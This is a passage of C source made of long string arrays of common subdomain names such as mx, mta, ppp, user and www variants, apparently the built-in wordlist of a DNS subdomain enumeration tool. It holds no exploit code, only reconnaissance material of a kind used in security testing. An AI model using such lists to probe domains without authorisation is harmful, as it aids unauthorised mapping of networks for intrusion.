"mailout", "mailq", "mailrelay", "mailroom", "mails", "mailserv", "mailserver", "mailsite", "mailsrv", "mailtest", "mailx", "main", "maine", "maint", "mall", "manage", "management", "manager", "mandelbrot", "mandelspawn", "mango", "manufacturing", "map", "mapas", "maple", "maps", "mapserver", "marge", "maria", "mark", "marketing", "marketplace", "mars", "martin", "marvin", "mary", "maryland", "massachusetts", "master", "matrix", "max", "maxwell", "mb", "mbox", "mc", "mci", "md", "mdaemon", "mdm", "mdns", "me", "media", "medusa", "meet", "meeting", "member", "members", "memphis", "mercury", "merkur", "merlin", "messages", "messenger", "meta", "metis", "mf", "mg", "mgmt", "mh", "mi", "miami", "michael", "michigan", "mickey", "microsoft-ds", "midwest", "miembros", "mike", "milwaukee", "minerva", "mini", "minneapolis", "minnesota", "miranda", "mirror", "mirrors", "mis", "mississippi", "missouri", "mj", "mj0", "mj1", "mk", "ml", "mm", "mmcc", "mms", "mn", "mng", "mngt", "mo", "mob", "mobile", "mobileauth", "mobilemail", "modem", "moe", "moira_db", "moira_update", "moira_ureg", "mojito", "mom", "mon", "mon1", "mon2", "monet", "monitor", "monitor01", "monitoring", "monkey", "monster", "montana", "moodle", "moon", "mordor", "moria", "morpheus", "moscow", "mout", "movies", "movil", "moz", "mozart", "mp", "mp3", "mpeg", "mpg", "mpls", "mq", "mr", "mrtd", "mrtg", "ms", "ms-exchange", "ms-sql", "ms1", "ms2", "msexchange", "msnp", "msp", "mssql", "mssql0", "mssql01", "mssql1", "mt", "mta", "mta01", "mta1", "mta10", "mta11", "mta12", "mta13", "mta14", "mta15", "mta16", "mta17", "mta18", "mta19", "mta2", "mta20", "mta21", "mta22", "mta23", "mta24", "mta25", "mta26", "mta27", "mta28", "mta29", "mta3", "mta30", "mta31", "mta32", "mta33", "mta34", "mta35", "mta36", "mta37", "mta38", "mta39", "mta4", "mta40", "mta41", "mta42", "mta43", "mta44", "mta45", "mta46", "mta47", "mta49", "mta5", "mta50", "mta51", "mta53", "mta54", "mta55", "mta57", "mta58", "mta59", "mta6", "mta60", "mta7", 
"mta79", "mta8", "mta9", "mtp", "mtu", "mu", "multimedia", "munin", "music", "mustang", "mv", "mw", "mx", "mx0", "mx01", "mx02", "mx03", "mx04", "mx05", "mx06", "mx1", "mx10", "mx11", "mx12", "mx13", "mx14", "mx15", "mx16", "mx17", "mx18", "mx19", "mx2", "mx20", "mx21", "mx22", "mx23", "mx24", "mx25", "mx26", "mx27", "mx28", "mx29", "mx3", "mx30", "mx31", "mx32", "mx33", "mx34", "mx35", "mx36", "mx37", "mx38", "mx39", "mx4", "mx40", "mx41", "mx42", "mx43", "mx44", "mx45", "mx46", "mx47", "mx48", "mx49", "mx5", "mx50", "mx51", "mx52", "mx53", "mx54", "mx55", "mx56", "mx57", "mx58", "mx59", "mx6", "mx60", "mx61", "mx62", "mx63", "mx64", "mx65", "mx66", "mx67", "mx68", "mx69", "mx7", "mx70", "mx71", "mx72", "mx73", "mx74", "mx75", "mx76", "mx77", "mx78", "mx79", "mx8", "mx80", "mx81", "mx82", "mx83", "mx84", "mx85", "mx86", "mx87", "mx88", "mx89", "mx9", "mx90", "mx91", "mx92", "mx93", "mx94", "mx95", "mx96", "mx97", "mx98", "mx99", "my", "mymail", "mysql", "mysql0", "mysql01", "mysql1", "mz", "n", "n1", "n2", "na", "nagios", "name", "names", "nameserv", "nameserver", "narf", "nas", "nas1", "nas2", "nashville", "nat", "nat1", "nat2", "nat3", "nb", "nbp", "nc", "nd", "ndn-gw", "nds", "ndtp", "ne", "nebraska", "nebula", "nelson", "nemesis", "nemo", "neo", "neon", "neptun", "neptune", "nessus", "net", "net1", "net2", "net3", "net4", "netapp", "netbios", "netdata", "netflow", "netgear", "netlab", "netmail", "netmeeting", "netmon", "netnews", "netscaler", "netscreen", "netstat", "netstats", "netwall", "network", "network-via-ctc", "nevada", "never", "new", "newhampshire", "newjersey", "newmail", "newmexico", "neworleans", "news", "newsfeed", "newsfeed2", "newsfeeds", "newsgroups", "newsletter", "newton", "newyork", "newzealand", "nextstep", "nexus", "nf", "nfs", "ng", "nh", "ni", "nic", "nigeria", "ninstall", "nj", "nk", "nl", "nm", "nms", "nn", "nntp", "nntps", "no", "no-dns-yet", "noc", "noclog", "node", "node1", "node2", "node3", "node4", "node5", "nokia", "nombres", 
"nora", "north", "northcarolina", "northdakota", "northeast", "northwest", "notebook", "notes", "noticias", "nova", "novell", "november", "np", "nq", "nqs", "nr", "ns", "ns-", "ns-cache", "ns-ext", "ns0", "ns00", "ns01", "ns02", "ns03", "ns1", "ns10", "ns11", "ns12", "ns15", "ns2", "ns3", "ns4", "ns5", "ns6", "ns7", "ns8", "ns9", "nsa", "nsauth1", "nsca", "nscache", "nscache1", "nscache2", "nss", "nsv6", "nt", "nt4", "nt40", "ntalk", "ntmail", "ntp", "ntp0", "ntp1", "ntp2", "ntp3", "ntserver", "nu", "null", "nut", "nv", "nw", "nx", "ny", "nz", "o", "o1", "o2", "oa", "oak", "oakland", "ob", "obelix", "oberon", "oc", "oc48-pos9-0", "ocean", "ocs", "ocsp", "octopus", "od", "odin", "oe", "of", "office", "office2", "offices", "og", "oh", "ohio", "oi", "oj", "ojp-apply", "ok", "oklahoma", "oklahomacity", "ol", "old", "oldmail", "oleane-gw", "om", "oma", "omaha", "omega", "omicron", "omirr", "omniorb", "on", "one", "online", "ontario", "onyx", "oo", "op", "opac", "opal", "open", "openbsd", "openview", "openvpn", "operations", "ops", "ops0", "ops01", "ops02", "ops1", "ops2", "opsware", "oq", "or", "ora", "oracle", "orange", "oraportal", "order", "orders", "oregon", "origin", "orion", "orlando", "os", "oscar", "osiris", "ospf6d", "ospfapi", "ospfd", "osx", "ot", "otrs", "ou", "out", "outbound", "outbound1", "outbound2", "outgoing", "outlook", "outside", "ov", "ow", "owa", "owa01", "owa02", "owa1", "owa2", "owl", "ows", "ox", "oxnard", "oxygen", "oy", "oz", "p", "p0-0", "p1", "p1-0", "p1-960", "p10", "p11", "p12", "p2", "p3", "p4", "p5", "p6", "p7", "pa", "pa1", "pa2", "pa67", "packages", "page", "pager", "pages", "paginas", "pan", "panda", "pandora", "panel", "panoramix", "panther", "papa", "paris", "parners", "partner", "partners", "pascal", "pat", "patch", "patches", "paul", "pawserv", "payroll", "pb", "pbx", "pc", "pc01", "pc02", "pc03", "pc04", "pc05", "pc06", "pc07", "pc08", "pc09", "pc1", "pc10", "pc101", "pc11", "pc12", "pc13", "pc14", "pc15", "pc16", "pc17", "pc18", 
"pc19", "pc2", "pc20", "pc21", "pc22", "pc23", "pc24", "pc25", "pc26", "pc27", "pc28", "pc29", "pc3", "pc30", "pc31", "pc32", "pc33", "pc34", "pc35", "pc36", "pc37", "pc38", "pc39", "pc4", "pc40", "pc41", "pc42", "pc43", "pc44", "pc45", "pc46", "pc47", "pc48", "pc49", "pc5", "pc50", "pc51", "pc52", "pc53", "pc54", "pc55", "pc56", "pc57", "pc58", "pc59", "pc6", "pc60", "pc61", "pc62", "pc63", "pc64", "pc65", "pc66", "pc67", "pc68", "pc69", "pc7", "pc70", "pc71", "pc72", "pc73", "pc74", "pc75", "pc76", "pc77", "pc78", "pc79", "pc8", "pc80", "pc81", "pc82", "pc83", "pc84", "pc85", "pc86", "pc87", "pc88", "pc89", "pc9", "pc90", "pc91", "pc92", "pc93", "pc94", "pc95", "pc96", "pc97", "pc98", "pc99", "pcanywhere", "pcmail", "pcrd", "pd", "pda", "pdc", "pe", "peach", "pegasus", "pendrell", "penguin", "pennsylvania", "penti", "people", "peoplesoft", "perseus", "personal", "peter", "pf", "pg", "pgp", "ph", "phantom", "phi", "philadelphia", "phobos", "phoebe", "phoenix", "phoeniz", "phone", "phones", "photo", "photon", "photos", "php", "pi", "picard", "picasso", "pics", "pictures", "pilot", "pine", "pink", "pipex-gw", "pironet", "pittsburgh", "pix", "pj", "pk", "pki", "pl", "plano", "platinum", "plato", "plesk", "plum", "pluto", "pluton", "pm", "pm1", "pm3", "pn", "po", "po-1", "po-2", "po1", "po100", "po2", "poczta", "polaris", "policy", "polls", "pollux", "polycom", "pool", "pop", "pop2", "pop3", "pop3s", "port", "portal", "portal2", "portalipv6", "portals", "portfolio", "portland", "pos1-0", "poseidon", "posix", "post", "posta", "postales", "postaweb", "postgresql", "posti", "postman", "postmaster", "postoffice", "power", "powerschool", "powertech-gw", "pp", "ppp", "ppp001", "ppp002", "ppp003", "ppp01", "ppp02", "ppp03", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp22", "ppp23", "ppp24", "ppp25", "ppp26", "ppp27", "ppp28", "ppp29", "ppp3", "ppp30", "ppp31", "ppp32", "ppp33", "ppp34", 
"ppp35", "ppp36", "ppp37", "ppp38", "ppp39", "ppp4", "ppp40", "ppp41", "ppp42", "ppp43", "ppp44", "ppp45", "ppp46", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "pq", "pr", "pre-prod", "predict", "prensa", "preprod", "press", "preview", "print", "printer", "printserv", "printserver", "priv", "privacy", "privat", "private", "prj", "pro", "problemtracker", "prod", "production", "products", "profiles", "project", "projects", "prometheus", "promo", "prop", "proteus", "proton", "proxy", "proxy1", "proxy2", "proxy3", "prueba", "pruebas", "ps", "psi", "pss", "pt", "ptr", "pu", "pub", "public", "pubs", "puck", "puma", "puppet", "purple", "pv", "pw", "pwdgen", "px", "py", "pz", "q", "qa", "qb", "qc", "qd", "qe", "qf", "qg", "qh", "qi", "qj", "qk", "ql", "qm", "qmail", "qmtp", "qn", "qo", "qotd", "qp", "qq", "qr", "qs", "qt", "qu", "quake", "quark", "quebec", "queen", "quotes", "qv", "qw", "qx", "qy", "qz", "r", "r00", "r01", "r02", "r1", "r2", "r2d2", "r3", "r7-pao1", "ra", "rabbit", "radio", "radius", "radius1", "radius2", "radon", "rainbow", "rapidsite", "raptor", "ras", "raven", "rb", "rc", "rcs", "rd", "rdns", "rdp", "re", "read", "real", "realserver", "recruiting", "recursive", "red", "redhat", "redirect", "redirect1", "redirect2", "redmine", "ref", "reference", "reg", "register", "registro", "registry", "regs", "relay", "relay01", "relay02", "relay1", "relay2", "relay3", "releases", "rem", "remote", "remote2", "remotefs", "remstats", "report", "reporting", "reports", "res", "res1", "res2", "research", "reseller", "reserved", "resolv1", "resolver", "resolver1", "resolver2", "restricted", "resumenes", "rev", "reverse", "rf", "rfe", "rg", "rh", "rhea", "rho", "rhodeisland", "ri", "rigel", "ripd", "ripe", "ripngd", "ris", "rj", "rje", "rk", "rl", "rlp", "rm", "rmi", "rn", "rnd", "rns2", "ro", "robert", "robin", "robinhood", "rock", "romeo", "romulus", "root", "rootd", "rose", "route", "router", "router-via-ctc", "router1", "router2", "rp", "rplay", "rptp", "rq", "rr", 
"rr1", "rs", "rs1", "rs2", "rss", "rsync", "rt", "rt1", "rt2", "rtelnet", "rtmp", "rtr", "rtr01", "rtr1", "rtsp", "ru", "ruby", "rune", "rv", "rw", "rwhois", "rx", "ry", "rz", "s", "s0", "s0-0", "s0-1", "s01", "s02", "s1", "s10", "s11", "s12", "s13", "s14", "s15", "s16", "s17", "s18", "s19", "s2", "s20", "s21", "s22", "s23", "s24", "s25", "s26", "s27", "s28", "s29", "s3", "s30", "s31", "s32", "s33", "s34", "s35", "s36", "s37", "s38", "s39", "s4", "s40", "s41", "s42", "s43", "s44", "s45", "s46", "s47", "s48", "s49", "s5", "s50", "s51", "s52", "s53", "s54", "s55", "s56", "s57", "s58", "s59", "s6", "s60", "s61", "s62", "s63", "s64", "s65", "s66", "s67", "s68", "s69", "s7", "s70", "s71", "s72", "s73", "s74", "s75", "s76", "s77", "s78", "s79", "s8", "s80", "s81", "s82", "s83", "s84", "s85", "s86", "s87", "s88", "s89", "s9", "s90", "s91", "s92", "s93", "s94", "s95", "s96", "s97", "s98", "s99", "sa", "sac", "sacramento", "sadmin", "safe", "saft", "sage", "sakura", "sales", "saltlake", "sam", "sample", "samples", "san", "sanantonio", "sandbox", "sandiego", "sane", "sanfrancisco", "sanjose", "sap", "sapgw", "sapphire", "sara", "saskatchewan", "saturn", "sauron", "sb", "sbs", "sc", "scan", "scanner", "scanner01", "schedules", "scotland", "scotty", "sd", "se", "search", "search6", "seattle", "sec", "sec1", "secondary", "secret", "secure", "secure1", "secure2", "secured", "securemail", "securid", "security", "seeweb-gw", "seguro", "send", "sendmail", "sentinel", "sentry", "seri", "serial", "serv", "serv1", "serv2", "server", "server01", "server02", "server03", "server1", "server10", "server11", "server12", "server2", "server3", "server4", "server5", "server6", "server7", "server8", "server9", "servers", "serveur", "service", "services", "services1", "servicio", "servicios", "servidor", "setup", "sf", "sftp", "sg", "sh", "shadow", "shannon", "share", "shared", "sharepoint", "shareware", "shark", "shell", "shell1", "shipping", "shiva", "shop", "shoppers", "shopping", "si", 
"sidn2", "siebel", "sierra", "sieve", "sigma", "signin", "signup", "silc", "silver", "sim", "simon", "sip", "sip-tls", "sirius", "site", "sites", "six", "sixxs", "sixxs-gw", "sj", "sk", "skkserv", "sky", "skynet", "skywalker", "sl", "slackware", "slmail", "sm", "smail", "smart", "smc", "sml", "smokeping", "sms", "smsqp", "smtp", "smtp-out", "smtp01", "smtp02", "smtp03", "smtp1", "smtp10", "smtp11", "smtp12", "smtp13", "smtp14", "smtp15", "smtp16", "smtp17", "smtp18", "smtp2", "smtp20", "smtp21", "smtp22", "smtp3", "smtp4", "smtp5", "smtp6", "smtp7", "smtp8", "smtp9", "smtphost", "smtpout", "smux", "sn", "snail", "sndv-pts01", "sniffer", "snmp", "snmp-trap", "snmpd", "snoopy", "snort", "snow", "snpp", "so", "so-0-0-0", "so-0-0-1", "so-0-1-0", "so-1-0-0", "so-2-0-0", "soap", "socal", "socios", "socks", "socrates", "software", "sokrates", "sol", "solar", "solaris", "solutions", "sonic", "soporte", "source", "sourcecode", "sourcesafe", "south", "southcarolina", "southdakota", "southeast", "southwest", "sp", "space", "spain", "spam", "spamd", "spamfilter", "spare", "speed", "speedtest", "speedy", "spider", "spiderman", "spike", "spl", "splunk", "spock", "spokane", "spot", "springfield", "sprint", "sq", "sqa", "sql", "sql0", "sql01", "sql1", "sql2", "sql7", "sqlserver", "squid", "squirrel", "squirrelmail", "sr", "src", "srv", "srv01", "srv02", "srv03", "srv1", "srv2", "srv3", "srv4", "srv5", "ss", "ssc", "ssh", "ssl", "ssl-vpn", "ssl0", "ssl01", "ssl1", "sslvpn", "ssmtp", "sso", "st", "staff", "stage", "staging", "stan", "star", "star-gw", "stargate", "start", "stat", "static", "station1", "station2", "station3", "station4", "statistics", "stats", "status", "stg", "stinky", "stlouis", "sto-cr1", "sto-cr2", "sto-cr3", "stock", "storage", "store", "storefront", "storm", "stream", "streaming", "stronghold", "strongmail", "student", "students", "studio", "styx", "su", "sub", "submission", "submit", "subversion", "suche", "sun", "sun0", "sun01", "sun02", "sun1", "sun2", 
"sunrpc", "supdup", "superman", "supfiledbg", "supfilesrv", "supplier", "suppliers", "support", "sur01", "survey", "surveys", "suucp", "sv", "sv1", "sv2", "svc", "svn", "svr01", "svr02", "svr1", "sw", "sw-core1", "sw0", "sw01", "sw1", "sw2", "sw3", "swat", "sweden", "switch", "switch1", "switch2", "switzerland", "sx", "sy", "sybase", "sydney", "sync", "sys2", "sysadmin", "sysback", "syslog", "syslogs", "sysrqd", "systat", "system", "sz", "szerver1", "szerver2", "szerver3", "szerver4", "szerver5", "t", "t1", "t2", "t3", "ta", "tacacs", "tacacs-ds", "tacoma", "tail", "taiwan", "talk", "tampa", "tango", "tao", "tarsier", "tau", "taurus", "tb", "tc", "tc1", "tcl", "tcpmux", "td", "te", "te-1-1", "te-1-2", "te-1-3", "te-2-1", "te-2-2", "te-3-1", "te2-1", "team", "tech", "technology", "techsupport", "telephone", "telephony", "telnet", "telnets", "temp", "tempo", "ten1-0-0", "tennessee", "teredo", "teredo-gw", "teredo-relay", "term", "terminal", "terminalserver", "termserv", "terra", "terror", "tesla", "test", "test1", "test2", "test2k", "test3", "test4", "test6", "test6www", "testajax", "testasp", "testaspnet", "testbed", "testcf", "testing", "testip6", "testipv6", "testjsp", "testlab", "testlinux", "testphp", "testserver", "testsite", "testsql", "testxp", "tethys", "texas", "tf", "tfido", "tftp", "tg", "tge-1-1", "tge8-1", "tge9-1", "th", "thailand", "the", "theta", "thinktank", "thomas", "thor", "thunder", "ti", "tick", "ticket", "tickets", "tienda", "tiger", "time", "timed", "tinc", "titan", "titania", "titanium", "tivoli", "tj", "tk", "tl", "tm", "tn", "tns", "to", "toad", "tokyo", "toledo", "tom", "tomocha", "tool", "tools", "top", "topaz", "toplayer", "tornado", "toronto", "tour", "tp", "tproxy", "tq", "tr", "trac", "tracker", "tracker0", "traffic", "train", "training", "transfer", "transfers", "traveler", "trinidad", "trinity", "triton", "trn1-iana", "ts", "ts01", "ts1", "ts2", "tsv01", "tt", "tu", "tu-0", "tu0", "tu1", "tu2", "tu3", "tu5", "tucson", "tulsa", 
"tunnel", "tunnel2", "tunnelbroker", "turing", "turtle", "tux", "tv", "tw", "twcc", "two", "tx", "ty", "tz", "u", "ua", "uat", "ub", "ubuntu", "uc", "ud", "uddi", "ue", "uer01", "uf", "ug", "uh", "uhura", "ui", "uj", "uk", "ul", "ulistserv", "ultracopier", "um", "un", "unassigned", "undernet-gw", "uni", "uniform", "union", "unitedkingdom", "unitedstates", "unix", "unixware", "unknown", "unused", "uo", "up", "up0-dc", "update", "updates", "upload", "uploads", "upp-cr1", "ups", "ups1", "upsilon", "uq", "ur", "ur01", "ur02", "ur03", "ur04", "uranus", "urchin", "us", "us1", "usa", "usenet", "user", "user1", "user10", "user11", "user12", "user13", "user14", "user15", "user16", "user17", "user18", "user19", "user2", "user20", "user21", "user22", "user23", "user24", "user25", "user26", "user27", "user28", "user29", "user3", "user30", "user31", "user32", "user33", "user34", "user35", "user36", "user37", "user38", "user39", "user4", "user40", "user41", "user42", "user43", "user44", "user45", "user46", "user47", "user48", "user49", "user5", "user50", "user51", "user52", "user53", "user54", "user55", "user56", "user57", "user58", "user59", "user6", "user60", "user61", "user62", "user63", "user64", "user65", "user66", "user67", "user68", "user69", "user7", "user70", "user71", "user72", "user73", "user74", "user75", "user76", "user77", "user78", "user79", "user8", "user80", "user81", "user82", "user83", "user84", "user85", "user86", "user87", "user88", "user89", "user9", "user90", "user91", "user92", "user93", "user94", "user95", "user96", "user97", "user98", "user99", "users", "ut", "utah", "utilities", "uu", "uucp", "uucp-path", "uv", "uw", "ux", "uy", "uz", "v", "v1", "v2", "v3", "v6", "v6gw", "v6www", "va", "vaak", "vab-core-1", "vab2-core-1", "vader", "vantive", "vault", "vb", "vboxd", "vc", "vcenter", "vd", "vds", "ve", "ve1", "ve8", "vega", "vegas", "vend", "vendors", "ventas", "venus", "vermont", "vf", "vg", "vh", "vhost", "vi", "victor", "video", "video6", "videos", 
"view", "viking", "violet", "vip", "viper", "virginia", "virgo", "virtual", "vision", "vista", "vj", "vk", "vl", "vl-6", "vl10", "vl100", "vl101", "vl102", "vl6-at", "vlad", "vlan-100", "vlan1", "vlan100", "vlan101", "vlan2", "vlan3", "vm", "vm0", "vm01", "vm1", "vm2", "vm3", "vm4", "vmail", "vmm", "vmserver", "vmware", "vn", "vnc", "vnetd", "vo", "vod", "voice", "voicemail", "voip", "voip1", "vopied", "vortex", "vox", "voyager", "vp", "vpn", "vpn0", "vpn01", "vpn02", "vpn1", "vpn2", "vpn3", "vpn4", "vps", "vps01", "vps1", "vps2", "vps3", "vq", "vr", "vs", "vs1", "vserv", "vserver", "vt", "vu", "vulcan", "vv", "vw", "vwww01", "vx", "vy", "vz", "w", "w-03", "w-04", "w01", "w1", "w2", "w3", "w4", "wa", "wais", "wall", "wallet", "wam", "wan", "wap", "warehouse", "warlord", "washington", "water", "watson", "wave", "wb", "wbm0", "wbm1", "wc", "wc3", "wd", "we", "weather", "web", "web0", "web01", "web02", "web03", "web04", "web1", "web10", "web11", "web12", "web2", "web3", "web4", "web5", "web6", "web7", "web8", "web9", "webaccess", "webadmin", "webalizer", "webapps", "webapps03", "webboard", "webcache", "webcam", "webcast", "webconf", "webct", "webdev", "webdocs", "webfarm", "webhelp", "webhost", "weblib", "weblog", "weblogic", "webmail", "webmail01", "webmail1", "webmail2", "webmaster", "webmin", "webproxy", "webring", "webs", "webserv", "webserver", "webservice", "webservices", "website", "websites", "websphere", "websrv", "websrvr", "webstats", "webster", "webstore", "websvr", "webtest", "webtest01", "webtrends", "webvpn", "welcome", "west", "westvirginia", "wf", "wg", "wh", "wh1", "whiskey", "white", "who", "whois", "wi", "wichita", "wifi", "wiki", "wililiam", "willow", "win", "win01", "win02", "win1", "win2", "win2000", "win2003", "win2008", "win2k", "win2k3", "win2k8", "wind", "windows", "windows01", "windows02", "windows1", "windows2", "windows2000", "windows2003", "windows2008", "windows7", "windowsvista", "windowsxp", "wingate", "winnt", "winproxy", "wins", 
"winserve", "winxp", "wire", "wireless", "wisconsin", "wj", "wk", "wl", "wlan", "wlan6", "wm", "wn", "wo", "wolf", "wordpress", "work", "world", "wp", "wpad", "wq", "wr", "write", "ws", "ws01", "ws02", "ws1", "ws10", "ws11", "ws12", "ws13", "ws14", "ws15", "ws16", "ws17", "ws18", "ws19", "ws2", "ws20", "ws21", "ws22", "ws23", "ws24", "ws25", "ws26", "ws27", "ws28", "ws29", "ws3", "ws30", "ws31", "ws32", "ws33", "ws34", "ws35", "ws36", "ws37", "ws38", "ws39", "ws4", "ws40", "ws41", "ws42", "ws43", "ws44", "ws45", "ws46", "ws47", "ws48", "ws49", "ws5", "ws50", "ws51", "ws52", "ws53", "ws54", "ws55", "ws56", "ws57", "ws6", "ws60", "ws7", "ws8", "ws9", "wsus", "wt", "wu", "wusage", "wv", "ww", "ww0", "ww00", "ww01", "ww02", "ww03", "ww1", "ww2", "ww3", "www", "www-", "www-0", "www-00", "www-01", "www-02", "www-03", "www-1", "www-2", "www-3", "www-6", "www-int", "www-ipv6", "www-test", "www-v6", "www-v6v4", "www0", "www00", "www01", "www02", "www03", "www1", "www10", "www11", "www12", "www13", "www14", "www2", "www3", "www4", "www5", "www6", "www6test", "www7", "www8", "www9", "wwwchat", "wwwdev", "wwwipv6", "wwwmail", "wwwtest", "wwwtest6", "wwwv6", "wx", "wy", "wyoming", "wz", "x", "x-ray", "x1", "x11", "xa", "xanthus", "xb", "xc", "xcii", "xd", "xdmcp", "xe", "xe-0-0-0", "xe-0-1-0", "xe-0-2-0", "xe-0-2-0-0", "xe-0-3-0", "xe-1-0-0", "xe-1-1-0", "xe-1-2-0-0", "xe-1-3-0", "xe-2-0-0", "xe-2-1-0", "xe-3-0-0", "xen", "xen1", "xenon", "xerox", "xf", "xg", "xh", "xi", "xj", "xk", "xl", "xlogan", "xm", "xmail", "xml", "xmpp-client", "xmpp-server", "xn", "xo", "xp", "xpilot", "xq", "xr", "xs", "xserve", "xt", "xtel", "xtell", "xu", "xv", "xw", "xx", "xy", "xz", "y", "ya", "yankee", "yb", "yc", "yd", "ye", "yellow", "yf", "yg", "yh", "yi", "yj", "yk", "yl", "ym", "yn", "yo", "yoda", "you", "young", "your", "yp", "yq", "yr", "ys", "yt", "yu", "yv", "yw", "yx", "yy", "yz", "z", "z-log", "z3950", "za", "zabbix", "zaphod", "zb", "zc", "zd", "ze", "zebra", "zebrasrv", "zen", "zera", 
"zero", "zeta", "zeus", "zf", "zg", "zh", "zi", "zimbra", "zion", "zip", "zixvpm", "zj", "zk", "zl", "zlog", "zm", "zn", "zo", "zope", "zp", "zq", "zr", "zs", "zserv", "zt", "zu", "zulu", "zv", "zw", "zx", "zy", "zz", "" }; char *sub_uber[] = { "0", "00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "0a", "0b", "0c", "0d", "0e", "0f", "1", "10", "10gigabitethernet1-2", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1cust1", "1cust10", "1cust11", "1cust12", "1cust13", "1cust14", "1cust15", "1cust16", "1cust17", "1cust18", "1cust19", "1cust2", "1cust20", "1cust21", "1cust22", "1cust23", "1cust24", "1cust25", "1cust26", "1cust27", "1cust28", "1cust29", "1cust3", "1cust30", "1cust31", "1cust32", "1cust33", "1cust34", "1cust35", "1cust36", "1cust37", "1cust38", "1cust39", "1cust4", "1cust40", "1cust41", "1cust42", "1cust43", "1cust44", "1cust45", "1cust46", "1cust47", "1cust48", "1cust49", "1cust5", "1cust50", "1cust51", "1cust52", "1cust53", "1cust54", "1cust55", "1cust56", "1cust57", "1cust58", "1cust59", "1cust6", "1cust60", "1cust61", "1cust62", "1cust63", "1cust64", "1cust65", "1cust66", "1cust67", "1cust68", "1cust69", "1cust7", "1cust70", "1cust71", "1cust72", "1cust73", "1cust74", "1cust75", "1cust76", "1cust77", "1cust78", "1cust79", "1cust8", "1cust80", "1cust81", "1cust82", "1cust83", "1cust84", "1cust85", "1cust86", "1cust87", "1cust88", "1cust89", "1cust9", "1cust90", "1cust91", "1cust92", "1cust93", "1cust94", "1cust95", "1cust96", "1cust97", "1cust98", "1cust99", "1d", "1e", "1f", "1g-bge0", "1g-eth0", "2", "20", "21", "21cust1", "21cust10", "21cust11", "21cust12", "21cust13", "21cust14", "21cust15", "21cust16", "21cust17", "21cust18", "21cust19", "21cust2", "21cust20", "21cust21", "21cust22", "21cust23", "21cust24", "21cust25", "21cust26", "21cust27", "21cust28", "21cust29", "21cust3", "21cust30", "21cust31", "21cust32", "21cust33", "21cust34", "21cust35", "21cust36", "21cust37", "21cust38", "21cust39", "21cust4", 
"21cust40", "21cust41", "21cust42", "21cust43", "21cust44", "21cust45", "21cust46", "21cust47", "21cust48", "21cust49", "21cust5", "21cust50", "21cust51", "21cust52", "21cust53", "21cust54", "21cust55", "21cust56", "21cust57", "21cust58", "21cust59", "21cust6", "21cust60", "21cust61", "21cust62", "21cust63", "21cust64", "21cust65", "21cust66", "21cust67", "21cust68", "21cust69", "21cust7", "21cust70", "21cust71", "21cust72", "21cust73", "21cust74", "21cust75", "21cust76", "21cust77", "21cust78", "21cust79", "21cust8", "21cust80", "21cust81", "21cust82", "21cust83", "21cust84", "21cust85", "21cust86", "21cust87", "21cust88", "21cust89", "21cust9", "21cust90", "21cust91", "21cust92", "21cust93", "21cust94", "21cust95", "21cust96", "21cust97", "21cust98", "21cust99", "22", "22cust1", "22cust10", "22cust11", "22cust12", "22cust13", "22cust14", "22cust15", "22cust16", "22cust17", "22cust18", "22cust19", "22cust2", "22cust20", "22cust21", "22cust22", "22cust23", "22cust24", "22cust25", "22cust26", "22cust27", "22cust28", "22cust29", "22cust3", "22cust30", "22cust31", "22cust32", "22cust33", "22cust34", "22cust35", "22cust36", "22cust37", "22cust38", "22cust39", "22cust4", "22cust40", "22cust41", "22cust42", "22cust43", "22cust44", "22cust45", "22cust46", "22cust47", "22cust48", "22cust49", "22cust5", "22cust50", "22cust51", "22cust52", "22cust53", "22cust54", "22cust55", "22cust56", "22cust57", "22cust58", "22cust59", "22cust6", "22cust60", "22cust61", "22cust62", "22cust63", "22cust64", "22cust65", "22cust66", "22cust67", "22cust68", "22cust69", "22cust7", "22cust70", "22cust71", "22cust72", "22cust73", "22cust74", "22cust75", "22cust76", "22cust77", "22cust78", "22cust79", "22cust8", "22cust80", "22cust81", "22cust82", "22cust83", "22cust84", "22cust85", "22cust86", "22cust87", "22cust88", "22cust89", "22cust9", "22cust90", "22cust91", "22cust92", "22cust93", "22cust94", "22cust95", "22cust96", "22cust97", "22cust98", "22cust99", "23", "24", "25", "26", "2607", "27", 
"28", "29", "2a", "2b", "2c", "2cust1", "2cust10", "2cust11", "2cust12", "2cust13", "2cust14", "2cust15", "2cust16", "2cust17", "2cust18", "2cust19", "2cust2", "2cust20", "2cust21", "2cust22", "2cust23", "2cust24", "2cust25", "2cust26", "2cust27", "2cust28", "2cust29", "2cust3", "2cust30", "2cust31", "2cust32", "2cust33", "2cust34", "2cust35", "2cust36", "2cust37", "2cust38", "2cust39", "2cust4", "2cust40", "2cust41", "2cust42", "2cust43", "2cust44", "2cust45", "2cust46", "2cust47", "2cust48", "2cust49", "2cust5", "2cust50", "2cust51", "2cust52", "2cust53", "2cust54", "2cust55", "2cust56", "2cust57", "2cust58", "2cust59", "2cust6", "2cust60", "2cust61", "2cust62", "2cust63", "2cust64", "2cust65", "2cust66", "2cust67", "2cust68", "2cust69", "2cust7", "2cust70", "2cust71", "2cust72", "2cust73", "2cust74", "2cust75", "2cust76", "2cust77", "2cust78", "2cust79", "2cust8", "2cust80", "2cust81", "2cust82", "2cust83", "2cust84", "2cust85", "2cust86", "2cust87", "2cust88", "2cust89", "2cust9", "2cust90", "2cust91", "2cust92", "2cust93", "2cust94", "2cust95", "2cust96", "2cust97", "2cust98", "2cust99", "2d", "2e", "2f", "3", "30", "31", "31337", "32", "32983d48de4470", "33", "34", "35", "36", "37", "38", "39", "3a", "3b", "3c", "3com", "3cust1", "3cust10", "3cust11", "3cust12", "3cust13", "3cust14", "3cust15", "3cust16", "3cust17", "3cust18", "3cust19", "3cust2", "3cust20", "3cust21", "3cust22", "3cust23", "3cust24", "3cust25", "3cust26", "3cust27", "3cust28", "3cust29", "3cust3", "3cust30", "3cust31", "3cust32", "3cust33", "3cust34", "3cust35", "3cust36", "3cust37", "3cust38", "3cust39", "3cust4", "3cust40", "3cust41", "3cust42", "3cust43", "3cust44", "3cust45", "3cust46", "3cust47", "3cust48", "3cust49", "3cust5", "3cust50", "3cust51", "3cust52", "3cust53", "3cust54", "3cust55", "3cust56", "3cust57", "3cust58", "3cust59", "3cust6", "3cust60", "3cust61", "3cust62", "3cust63", "3cust64", "3cust65", "3cust66", 